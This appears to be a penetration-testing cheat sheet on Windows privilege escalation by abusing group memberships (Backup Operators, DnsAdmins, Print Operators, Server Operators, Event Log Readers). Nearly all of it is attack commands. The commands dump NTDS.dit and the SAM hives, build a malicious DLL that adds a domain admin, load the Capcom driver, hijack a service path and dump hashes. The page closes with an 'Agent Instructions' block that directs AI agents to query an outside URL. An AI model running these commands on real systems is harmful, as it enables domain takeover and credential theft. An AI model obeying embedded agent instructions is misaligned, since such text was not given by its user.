# Windows Group Privileges ## Backup Operators Membership of this group grants its members the SeBackup and SeRestore privileges. #### 1 Import DLLs ```powershell Import-Module .\SeBackupPrivilegeUtils.dll Import-Module .\SeBackupPrivilegeCmdLets.dll ``` #### 2 Enable SebackupPrivilege ```powershell # Enable Set-SeBackupPrivilege # Verufy Get-SeBackupPrivilege ``` #### 3 Copy File ```powershell copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt ``` #### Copy NTDS.dit ```powershell diskshadow.exe DISKSHADOW> set verbose on DISKSHADOW> set metadata C:\Windows\Temp\meta.cab DISKSHADOW> set context clientaccessible DISKSHADOW> set context persistent DISKSHADOW> begin backup DISKSHADOW> add volume C: alias cdrive DISKSHADOW> create DISKSHADOW> expose %cdrive% E: DISKSHADOW> end backup DISKSHADOW> exit ``` #### Backup SAM + SYSTEM Hives ```powershell reg save HKLM\SYSTEM SYSTEM.SAV reg save HKLM\SAM SAM.SAV ``` #### Extract NTDS ```powershell Import-Module .\DSInternals.psd1 $key = Get-BootKey -SystemHivePath .\SYSTEM Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key ``` ## Event Log Reader ### Check Membership Group ```powershell net localgroup "Event Log Readers" ``` ### Searching Security Logs ```powershell # Without Credentials wevtutil qe Security /rd:true /f:text | Select-String "/user" # With Credentials wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user" ``` ## DnsAdmins #### 1 Generating Malicious DLL ```powershell msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll ``` #### 2 Load DLL ```powershell dnscmd.exe /config /serverlevelplugindll adduser.dll ``` #### 3 Restart Service ```powershell sc stop dns sc start dns ``` ## Print Operators Print Operators is another highly privileged group, which grants its members the SeLoadDriverPrivilege, rights to manage, create, share, and delete printers connected to a Domain Controller, as well as the ability to log on locally to a Domain Controller and shut it down. ### 1 Compile CPP File ```powershell cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp ``` ### 2 Add Capcop.sys ```powershell reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys" reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1 ``` ### 3 Verify Privilege Enables ```powershell EnableSeLoadDriverPrivilege.exe ``` ### 4 Run Exploit ```powershell .\ExploitCapcom.exe ``` ## Server Operators Allows members to administer Windows servers without needing assignment of Domain Admin privileges. It is a very highly privileged group that can log in locally to servers, including Domain Controllers. ### 1 Query Service ```powershell # Check if it's SYSTEM sc qc AppReadiness ``` ### 2 Service Permissions Check ```powershell c:\Tools\PsService.exe security AppReadiness ``` ### 3 Modify Service Binary Path ```powershell sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add" ``` ### 4 Start / Stop Service ```powershell sc stop AppReadiness sc start AppReadiness ``` ### 5 Dump Hashes ```powershell secretsdump.py server_adm@10.129.43.9 -just-dc-user administrator ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://martian1337.gitbook.io/notes/notes/network-security/windows-privesc/windows-group-privileges.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.